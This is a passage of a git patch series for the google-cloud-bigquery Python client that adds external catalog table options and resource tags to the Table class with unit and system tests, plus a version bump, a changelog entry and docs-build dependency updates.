a/google/cloud/bigquery/magics/magics.py +++ b/google/cloud/bigquery/magics/magics.py @@ -56,7 +56,7 @@ bigquery_magics = None -IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) +IPYTHON_USER_AGENT = "ipython-{}".format(IPython.__version__) # type: ignore class Context(object): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 80ab330ba..fa8d81962 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -69,6 +69,7 @@ from google.cloud.bigquery.schema import _build_schema_resource from google.cloud.bigquery.schema import _parse_schema_resource from google.cloud.bigquery.schema import _to_schema_fields +from google.cloud.bigquery import external_config if typing.TYPE_CHECKING: # pragma: NO COVER # Unconditionally import optional dependencies again to tell pytype that @@ -408,6 +409,7 @@ class Table(_TableBase): "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", "max_staleness": "maxStaleness", + "external_catalog_table_options": "externalCatalogTableOptions", } def __init__(self, table_ref, schema=None) -> None: @@ -1023,6 +1025,39 @@ def table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @property + def external_catalog_table_options( + self, + ) -> Optional[external_config.ExternalCatalogTableOptions]: + """Options defining open source compatible datasets living in the + BigQuery catalog. Contains metadata of open source database, schema + or namespace represented by the current dataset.""" + + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ) + if prop is not None: + return external_config.ExternalCatalogTableOptions.from_api_repr(prop) + return None + + @external_catalog_table_options.setter + def external_catalog_table_options( + self, value: Union[external_config.ExternalCatalogTableOptions, dict, None] + ): + value = _helpers._isinstance_or_raise( + value, + (external_config.ExternalCatalogTableOptions, dict), + none_allowed=True, + ) + if isinstance(value, external_config.ExternalCatalogTableOptions): + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ] = value.to_api_repr() + else: + self._properties[ + self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] + ] = value + @classmethod def from_string(cls, full_table_id: str) -> "Table": """Construct a table from fully-qualified table ID. diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 0c27d8e56..7f84a9f5b 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -14,6 +14,7 @@ import base64 import copy +from typing import Any, Dict, Optional import unittest from google.cloud.bigquery import external_config @@ -979,3 +980,139 @@ def test_from_api_repr(self): assert isinstance(result, external_config.ExternalCatalogDatasetOptions) assert result._properties == api_repr + + +class TestExternalCatalogTableOptions: + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.external_config import ExternalCatalogTableOptions + + return ExternalCatalogTableOptions + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + storage_descriptor_repr = { + "inputFormat": "testpath.to.OrcInputFormat", + "locationUri": "gs://test/path/", + "outputFormat": "testpath.to.OrcOutputFormat", + "serDeInfo": { + "serializationLibrary": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + }, + } + + CONNECTIONID = "connection123" + PARAMETERS = {"key": "value"} + STORAGEDESCRIPTOR = schema.StorageDescriptor.from_api_repr(storage_descriptor_repr) + EXTERNALCATALOGTABLEOPTIONS = { + "connectionId": "connection123", + "parameters": {"key": "value"}, + "storageDescriptor": STORAGEDESCRIPTOR.to_api_repr(), + } + + @pytest.mark.parametrize( + "connection_id,parameters,storage_descriptor", + [ + ( + CONNECTIONID, + PARAMETERS, + STORAGEDESCRIPTOR, + ), # set all parameters at once + (CONNECTIONID, None, None), # set only one parameter at a time + (None, PARAMETERS, None), + (None, None, STORAGEDESCRIPTOR), # set storage descriptor using obj + (None, None, storage_descriptor_repr), # set storage descriptor using dict + (None, None, None), # use default parameters + ], + ) + def test_ctor_initialization( + self, + connection_id, + parameters, + storage_descriptor, + ): + instance = self._make_one( + connection_id=connection_id, + parameters=parameters, + storage_descriptor=storage_descriptor, + ) + + assert instance.connection_id == connection_id + assert instance.parameters == parameters + + if isinstance(storage_descriptor, schema.StorageDescriptor): + assert ( + instance.storage_descriptor.to_api_repr() + == storage_descriptor.to_api_repr() + ) + elif isinstance(storage_descriptor, dict): + assert instance.storage_descriptor.to_api_repr() == storage_descriptor + else: + assert instance.storage_descriptor is None + + @pytest.mark.parametrize( + "connection_id,parameters,storage_descriptor", + [ + pytest.param( + 123, + PARAMETERS, + STORAGEDESCRIPTOR, + id="connection_id-invalid-type", + ), + pytest.param( + CONNECTIONID, + 123, + STORAGEDESCRIPTOR, + id="parameters-invalid-type", + ), + pytest.param( + CONNECTIONID, + PARAMETERS, + 123, + id="storage_descriptor-invalid-type", + ), + ], + ) + def test_ctor_invalid_input( + self, + connection_id: str, + parameters: Dict[str, Any], + storage_descriptor: Optional[schema.StorageDescriptor], + ): + with pytest.raises(TypeError) as e: + external_config.ExternalCatalogTableOptions( + connection_id=connection_id, + parameters=parameters, + storage_descriptor=storage_descriptor, + ) + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_to_api_repr(self): + instance = self._make_one( + connection_id=self.CONNECTIONID, + parameters=self.PARAMETERS, + storage_descriptor=self.STORAGEDESCRIPTOR, + ) + + result = instance.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + + assert result == expected + + def test_from_api_repr(self): + result = self._make_one( + connection_id=self.CONNECTIONID, + parameters=self.PARAMETERS, + storage_descriptor=self.STORAGEDESCRIPTOR, + ) + + instance = self._make_one() + api_repr = self.EXTERNALCATALOGTABLEOPTIONS + result = instance.from_api_repr(api_repr) + + assert isinstance(result, external_config.ExternalCatalogTableOptions) + assert result._properties == api_repr diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index e9d461e9d..de8b331f5 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -30,6 +30,7 @@ from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import exceptions +from google.cloud.bigquery import external_config from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import DatasetReference @@ -5879,6 +5880,92 @@ def test_from_api_repr_only_foreign_keys_resource(self): self.assertIsNotNone(instance.foreign_keys) +class TestExternalCatalogTableOptions: + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + DATASET = DatasetReference(PROJECT, DATASET_ID) + TABLEREF = DATASET.table(TABLE_ID) + + @staticmethod + def _get_target_class(self): + from google.cloud.bigquery.table import Table + + return Table + + def _make_one(self, *args, **kw): + return self._get_target_class(self)(*args, **kw) + + EXTERNALCATALOGTABLEOPTIONS = { + "connection_id": "connection123", + "parameters": {"key": "value"}, + "storage_descriptor": { + "input_format": "testpath.to.OrcInputFormat", + "location_uri": "gs://test/path/", + "output_format": "testpath.to.OrcOutputFormat", + "serde_info": { + "serialization_library": "testpath.to.LazySimpleSerDe", + "name": "serde_lib_name", + "parameters": {"key": "value"}, + }, + }, + } + + def test_external_catalog_table_options_default_initialization(self): + table = self._make_one(self.TABLEREF) + + assert table.external_catalog_table_options is None + + def test_external_catalog_table_options_valid_inputs(self): + table = self._make_one(self.TABLEREF) + + # supplied in api_repr format + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + # supplied in obj format + ecto = external_config.ExternalCatalogTableOptions.from_api_repr( + self.EXTERNALCATALOGTABLEOPTIONS + ) + assert isinstance(ecto, external_config.ExternalCatalogTableOptions) + + table.external_catalog_table_options = ecto + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + def test_external_catalog_table_options_invalid_input(self): + table = self._make_one(self.TABLEREF) + + # invalid on the whole + with pytest.raises(TypeError) as e: + table.external_catalog_table_options = 123 + + # Looking for the first word from the string "Pass as..." + assert "Pass " in str(e.value) + + def test_external_catalog_table_options_to_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + result = table.external_catalog_table_options.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + def test_external_catalog_table_options_from_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.external_catalog_table_options = self.EXTERNALCATALOGTABLEOPTIONS + ecto = external_config.ExternalCatalogTableOptions.from_api_repr( + self.EXTERNALCATALOGTABLEOPTIONS + ) + result = ecto.to_api_repr() + expected = self.EXTERNALCATALOGTABLEOPTIONS + assert result == expected + + @pytest.mark.parametrize( "table_path", ( From b44fda08cbe52acf2a5137d2056f006100aab938 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 21 Jan 2025 10:08:46 -0800 Subject: [PATCH 056/202] chore(main): release 3.29.0 (#2117) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 12 ++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 13 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 6a7ff5641..45c39e19c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,18 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.29.0](https://github.com/googleapis/python-bigquery/compare/v3.28.0...v3.29.0) (2025-01-21) + + +### Features + +* Add ExternalCatalogTableOptions class and tests ([#2116](https://github.com/googleapis/python-bigquery/issues/2116)) ([cdc1a6e](https://github.com/googleapis/python-bigquery/commit/cdc1a6e1623b8305c6a6a1a481b3365e866a073d)) + + +### Bug Fixes + +* Add default value in SchemaField.from_api_repr() ([#2115](https://github.com/googleapis/python-bigquery/issues/2115)) ([7de6822](https://github.com/googleapis/python-bigquery/commit/7de6822e1c556a68cb8d50e90664c094697cca1d)) + ## [3.28.0](https://github.com/googleapis/python-bigquery/compare/v3.27.0...v3.28.0) (2025-01-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 7da2c534f..3d852b8a3 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.28.0" +__version__ = "3.29.0" From d4070ca21b5797e900a9e87b966837ee1c278217 Mon Sep 17 00:00:00 2001 From: "Hiroki.H (mahiro)" <56078795+hrkh@users.noreply.github.com> Date: Wed, 22 Jan 2025 04:31:33 +0900 Subject: [PATCH 057/202] feat: support resource_tags for table (#2093) * feat: support resource_tags for table * fix: system test for resource tags * fix: typo * fix: unit test * Update tests/unit/test_client.py * Update google/cloud/bigquery/table.py * Update google/cloud/bigquery/table.py * Update google/cloud/bigquery/table.py * fix: append random string suffix to resource tags to prevent test conflicts * Update google/cloud/bigquery/table.py --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 17 +++++++++++++ tests/system/test_client.py | 44 ++++++++++++++++++++++++++++++++-- tests/unit/test_client.py | 6 ++++- tests/unit/test_table.py | 27 +++++++++++++++++++++ 4 files changed, 91 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index fa8d81962..934a28cfc 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -409,6 +409,7 @@ class Table(_TableBase): "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", "max_staleness": "maxStaleness", + "resource_tags": "resourceTags", "external_catalog_table_options": "externalCatalogTableOptions", } @@ -1025,6 +1026,22 @@ def table_constraints(self) -> Optional["TableConstraints"]: table_constraints = TableConstraints.from_api_repr(table_constraints) return table_constraints + @property + def resource_tags(self): + """Dict[str, str]: Resource tags for the table. + + See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table.FIELDS.resource_tags + """ + return self._properties.setdefault( + self._PROPERTY_TO_API_FIELD["resource_tags"], {} + ) + + @resource_tags.setter + def resource_tags(self, value): + if not isinstance(value, dict) and value is not None: + raise ValueError("resource_tags must be a dict or None") + self._properties[self._PROPERTY_TO_API_FIELD["resource_tags"]] = value + @property def external_catalog_table_options( self, diff --git a/tests/system/test_client.py b/tests/system/test_client.py index c0dd83b12..30e9f94a3 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -732,6 +732,16 @@ def test_list_tables(self): def test_update_table(self): dataset = self.temp_dataset(_make_dataset_id("update_table")) + # This creates unique tag keys for each of test runnings for different Python versions + tag_postfix = "".join(random.choices(string.ascii_letters + string.digits, k=4)) + tag_1 = f"owner_{tag_postfix}" + tag_2 = f"classification_{tag_postfix}" + tag_3 = f"env_{tag_postfix}" + + self._create_resource_tag_key_and_values(tag_1, ["Alice", "Bob"]) + self._create_resource_tag_key_and_values(tag_2, ["public"]) + self._create_resource_tag_key_and_values(tag_3, ["dev"]) + TABLE_NAME = "test_table" table_arg = Table(dataset.table(TABLE_NAME), schema=SCHEMA) self.assertFalse(_table_exists(table_arg)) @@ -744,14 +754,25 @@ def test_update_table(self): table.friendly_name = "Friendly" table.description = "Description" table.labels = {"priority": "high", "color": "blue"} + table.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "Alice", + f"{Config.CLIENT.project}/{tag_3}": "dev", + } table2 = Config.CLIENT.update_table( - table, ["friendly_name", "description", "labels"] + table, ["friendly_name", "description", "labels", "resource_tags"] ) self.assertEqual(table2.friendly_name, "Friendly") self.assertEqual(table2.description, "Description") self.assertEqual(table2.labels, {"priority": "high", "color": "blue"}) + self.assertEqual( + table2.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "Alice", + f"{Config.CLIENT.project}/{tag_3}": "dev", + }, + ) table2.description = None table2.labels = { @@ -759,9 +780,28 @@ def test_update_table(self): "shape": "circle", # add "priority": None, # delete } - table3 = Config.CLIENT.update_table(table2, ["description", "labels"]) + table2.resource_tags = { + f"{Config.CLIENT.project}/{tag_1}": "Bob", # change + f"{Config.CLIENT.project}/{tag_2}": "public", # add + f"{Config.CLIENT.project}/{tag_3}": None, # delete + } + table3 = Config.CLIENT.update_table( + table2, ["description", "labels", "resource_tags"] + ) self.assertIsNone(table3.description) self.assertEqual(table3.labels, {"color": "green", "shape": "circle"}) + self.assertEqual( + table3.resource_tags, + { + f"{Config.CLIENT.project}/{tag_1}": "Bob", + f"{Config.CLIENT.project}/{tag_2}": "public", + }, + ) + + # Delete resource tag bindings. + table3.resource_tags = None + table4 = Config.CLIENT.update_table(table3, ["resource_tags"]) + self.assertEqual(table4.resource_tags, {}) # If we try to update using table2 again, it will fail because the # previous update changed the ETag. diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 14089b031..462a70bbe 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2320,6 +2320,7 @@ def test_update_table(self): "description": description, "friendlyName": title, "labels": {"x": "y"}, + "resourceTags": {"123456789012/key": "value"}, } ) schema = [ @@ -2343,7 +2344,8 @@ def test_update_table(self): table.description = description table.friendly_name = title table.labels = {"x": "y"} - fields = ["schema", "description", "friendly_name", "labels"] + table.resource_tags = {"123456789012/key": "value"} + fields = ["schema", "description", "friendly_name", "labels", "resource_tags"] with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: @@ -2375,6 +2377,7 @@ def test_update_table(self): "description": description, "friendlyName": title, "labels": {"x": "y"}, + "resourceTags": {"123456789012/key": "value"}, } conn.api_request.assert_called_once_with( method="PATCH", data=sent, path="/" + path, timeout=7.5 @@ -2383,6 +2386,7 @@ def test_update_table(self): self.assertEqual(updated_table.friendly_name, table.friendly_name) self.assertEqual(updated_table.schema, table.schema) self.assertEqual(updated_table.labels, table.labels) + self.assertEqual(updated_table.resource_tags, table.resource_tags) # ETag becomes If-Match header. table._properties["etag"] = "etag" diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index de8b331f5..5154f01d8 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1481,6 +1481,33 @@ def test_encryption_configuration_setter(self): table.encryption_configuration = None self.assertIsNone(table.encryption_configuration) + def test_resource_tags_getter_empty(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + self.assertEqual(table.resource_tags, {}) + + def test_resource_tags_update_in_place(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + table.resource_tags["123456789012/key"] = "value" + self.assertEqual(table.resource_tags, {"123456789012/key": "value"}) + + def test_resource_tags_setter(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + table.resource_tags = {"123456789012/key": "value"} + self.assertEqual(table.resource_tags, {"123456789012/key": "value"}) + + def test_resource_tags_setter_bad_value(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + with self.assertRaises(ValueError): + table.resource_tags = 12345 + def test___repr__(self): from google.cloud.bigquery.table import TableReference From 3d62c165c510daf8a3f000e8c6e4acf7b58cf67c Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Mon, 27 Jan 2025 12:13:24 -0800 Subject: [PATCH 058/202] chore(python): fix docs publish build (#2113) Source-Link: https://github.com/googleapis/synthtool/commit/bd9ede2fea1b640b7e90d5a1d110e6b300a2b43f Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- .github/.OwlBot.lock.yaml | 4 +- .kokoro/docker/docs/requirements.in | 1 + .kokoro/docker/docs/requirements.txt | 243 ++++++++++++++++++++++++++- .kokoro/publish-docs.sh | 4 - 4 files changed, 237 insertions(+), 15 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 10cf433a8..4c0027ff1 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:8ff1efe878e18bd82a0fb7b70bb86f77e7ab6901fed394440b6135db0ba8d84a -# created: 2025-01-09T12:01:16.422459506Z + digest: sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a +# created: 2025-01-16T15:24:11.364245182Z diff --git a/.kokoro/docker/docs/requirements.in b/.kokoro/docker/docs/requirements.in index 816817c67..586bd0703 100644 --- a/.kokoro/docker/docs/requirements.in +++ b/.kokoro/docker/docs/requirements.in @@ -1 +1,2 @@ nox +gcp-docuploader diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index f99a5c4aa..a9360a25b 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -2,16 +2,124 @@ # This file is autogenerated by pip-compile with Python 3.10 # by the following command: # -# pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in +# pip-compile --allow-unsafe --generate-hashes requirements.in # -argcomplete==3.5.2 \ - --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ - --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb +argcomplete==3.5.3 \ + --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ + --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 # via nox +cachetools==5.5.0 \ + --hash=sha256:02134e8439cdc2ffb62023ce1debca2944c3f289d66bb17ead3ab3dede74b292 \ + --hash=sha256:2cc24fb4cbe39633fb7badd9db9ca6295d766d9c2995f245725a46715d050f2a + # via google-auth +certifi==2024.12.14 \ + --hash=sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56 \ + --hash=sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db + # via requests +charset-normalizer==3.4.1 \ + --hash=sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537 \ + --hash=sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa \ + --hash=sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a \ + --hash=sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294 \ + --hash=sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b \ + --hash=sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd \ + --hash=sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601 \ + --hash=sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd \ + --hash=sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4 \ + --hash=sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d \ + --hash=sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2 \ + --hash=sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313 \ + --hash=sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd \ + --hash=sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa \ + --hash=sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8 \ + --hash=sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1 \ + --hash=sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2 \ + --hash=sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496 \ + --hash=sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d \ + --hash=sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b \ + --hash=sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e \ + --hash=sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a \ + --hash=sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4 \ + --hash=sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca \ + --hash=sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78 \ + --hash=sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408 \ + --hash=sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5 \ + --hash=sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3 \ + --hash=sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f \ + --hash=sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a \ + --hash=sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765 \ + --hash=sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6 \ + --hash=sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146 \ + --hash=sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6 \ + --hash=sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9 \ + --hash=sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd \ + --hash=sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c \ + --hash=sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f \ + --hash=sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545 \ + --hash=sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176 \ + --hash=sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770 \ + --hash=sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824 \ + --hash=sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f \ + --hash=sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf \ + --hash=sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487 \ + --hash=sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d \ + --hash=sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd \ + --hash=sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b \ + --hash=sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534 \ + --hash=sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f \ + --hash=sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b \ + --hash=sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9 \ + --hash=sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd \ + --hash=sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125 \ + --hash=sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9 \ + --hash=sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de \ + --hash=sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11 \ + --hash=sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d \ + --hash=sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35 \ + --hash=sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f \ + --hash=sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda \ + --hash=sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7 \ + --hash=sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a \ + --hash=sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971 \ + --hash=sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8 \ + --hash=sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41 \ + --hash=sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d \ + --hash=sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f \ + --hash=sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757 \ + --hash=sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a \ + --hash=sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886 \ + --hash=sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77 \ + --hash=sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76 \ + --hash=sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247 \ + --hash=sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85 \ + --hash=sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb \ + --hash=sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7 \ + --hash=sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e \ + --hash=sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6 \ + --hash=sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037 \ + --hash=sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1 \ + --hash=sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e \ + --hash=sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807 \ + --hash=sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407 \ + --hash=sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c \ + --hash=sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12 \ + --hash=sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3 \ + --hash=sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089 \ + 